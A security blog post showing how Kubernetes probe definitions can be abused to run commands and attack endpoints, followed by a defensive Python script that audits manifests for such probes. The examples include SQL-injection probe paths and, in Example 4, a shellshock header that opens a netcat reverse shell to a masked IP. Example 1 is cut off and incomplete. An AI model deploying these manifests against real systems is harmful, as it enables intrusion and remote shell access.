📅 February 8, 2022 ✍️ Philippe Bogaerts ⏱️ 2 min read 📁 Security
Kubernetes Container Security

Introduction

Startup, readiness, and liveness probes are very well described in the Kubernetes documentation. The kubelet uses these probes, defined in the pod manifest, to verify whether a pod is booting, ready to accept traffic, and still alive. It is the kubelet that actually executes the probes (and not the pod itself).

There are different ways the probes are executed:

  • httpGet
  • exec

According to the reviewers, the problems described here are considered 'as designed', since you should download containers from a trusted source.

The examples below show that trusted sources of container images will not solve the problem, and neither will image scanning. To prevent an attack from happening, it is mandatory to scan the Kubernetes pod and deployment manifests rigorously before deploying (and not use any pre-canned examples :-))

Examples

Example 1: Overwriting files on the pod filesystem

This code snippet overwrites the pod's /etc/hosts file to spoof hostnames:

```yaml
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  labels:
    test: liveness
  name: liveness-exec15
spec:
  containers:
  - name: liveness
    image: xxradar/hackon
    args:
    - /bin/sh
    - -c
    - touch /tmp/healthy;sleep 600
    livenessProbe:
      exec:
        command:
```

Example 2: Installing applications in a pod at deployment time

```yaml
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  labels:
    test: liveness
  name: liveness-exec39
spec:
  containers:
  - name: liveness
    image: ubuntu
    args:
    - /bin/sh
    - -c
    - touch /tmp/healthy;sleep 600
    readinessProbe:
      exec:
        command:
        - apt-get
        - update
      initialDelaySeconds: 5
      periodSeconds: 10
      timeoutSeconds: 60
    livenessProbe:
      exec:
        command:
        - apt-get
        - install
        - -y
        - curl
      initialDelaySeconds: 60
      periodSeconds: 100
      timeoutSeconds: 60
EOF
```

Example 3: Attacking http(s) endpoints using SQL injection, XSS, ...

```yaml
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  labels:
    test: liveness
  name: liveness3
spec:
  containers:
  - name: liveness
    image: ubuntu
    args:
    - /bin/sh
    - -c
    - touch /tmp/healthy;sleep 600
    livenessProbe:
      httpGet:
        host: www.xxxx.com
        path: /?'OR 1=1--
        port: 8080
        httpHeaders:
        - name: User-Agent
          value: xxxxxxxxx
EOF
```

Example 4: Attacking http(s) endpoints using shellshock

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: radarhack-pod3
  labels:
    pod: radarhack
spec:
  containers:
  - name: radarhack
    image: docker.io/xxradar/naxsi5
    ports:
    - containerPort: 80
    livenessProbe:
      httpGet:
        host: www.xxxxx.com
        path: /index.html?test=' or 1=1--
        port: 8080
        httpHeaders:
        - name: Custom-Header
          value: Awesome
        - name: X-Frame-Options
          value: () { :;};echo;/bin/nc -e /bin/bash 1.1.x.x 443
      initialDelaySeconds: 3
      periodSeconds: 3
```

Conclusion

Much has been written about securely deploying applications on Kubernetes. Keep in mind that every aspect needs full attention, and that generating and building Kubernetes manifests is also developing code.
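
One way to run the manifest review called for in the introduction, as an added example that is not code from the original post: a pre-deployment check that walks every probe in a Pod or workload manifest and reports exec commands, httpGet hosts, paths and header values that fall outside a policy. The allowlist, the regular expressions and the function names are assumptions for illustration, and the manifest is read as JSON so that only the standard library is needed.

```python
import json
import re

# Assumed policy (hypothetical, tune per cluster): binaries an exec probe may run,
# and the characters allowed in httpGet paths and header values.
ALLOWED_EXEC = {"cat", "test", "pg_isready"}
SAFE_PATH = re.compile(r"^/[A-Za-z0-9/_.\-]*$")
SAFE_HEADER = re.compile(r"^[A-Za-z0-9 /_.,;=\-]*$")
PROBES = ("startupProbe", "readinessProbe", "livenessProbe")

def pod_spec(manifest):
    """Return the pod spec of a Pod or of a workload that embeds a pod template."""
    spec = manifest.get("spec", {})
    spec = spec.get("jobTemplate", {}).get("spec", spec)   # CronJob
    return spec.get("template", {}).get("spec", spec)      # Deployment, Job, ...

def audit_probes(manifest):
    """Return one finding per probe setting that needs human review."""
    findings = []
    spec = pod_spec(manifest)
    for c in spec.get("containers", []) + spec.get("initContainers", []):
        for kind in PROBES:
            probe = c.get(kind) or {}
            where = f"{c.get('name')}.{kind}"
            argv = (probe.get("exec") or {}).get("command") or []
            if argv and argv[0].rsplit("/", 1)[-1] not in ALLOWED_EXEC:
                findings.append(f"{where}: exec runs non-allowlisted {argv[0]!r}")
            http = probe.get("httpGet") or {}
            if http.get("host"):
                findings.append(f"{where}: httpGet targets host {http['host']!r}, not the pod IP")
            if "path" in http and not SAFE_PATH.match(http["path"]):
                findings.append(f"{where}: httpGet path has unexpected characters")
            for h in http.get("httpHeaders") or []:
                if not SAFE_HEADER.match(h.get("value", "")):
                    findings.append(f"{where}: header {h.get('name')!r} has unexpected characters")
    return findings

# Constructed sample: probe settings modelled on Examples 2 and 3, as JSON.
SAMPLE = json.loads("""{"kind": "Pod", "spec": {"containers": [{"name": "liveness",
  "readinessProbe": {"exec": {"command": ["apt-get", "update"]}},
  "livenessProbe": {"httpGet": {"host": "www.xxxx.com", "path": "/?'OR 1=1--",
    "port": 8080, "httpHeaders": [{"name": "User-Agent", "value": "xxxxxxxxx"}]}}}]}}""")

if __name__ == "__main__":
    for line in audit_probes(SAMPLE):
        print(line)
```

A YAML manifest can be converted to JSON for this check with `kubectl apply --dry-run=client -o json -f pod.yaml`, and a CI job can fail the build whenever the returned list is not empty.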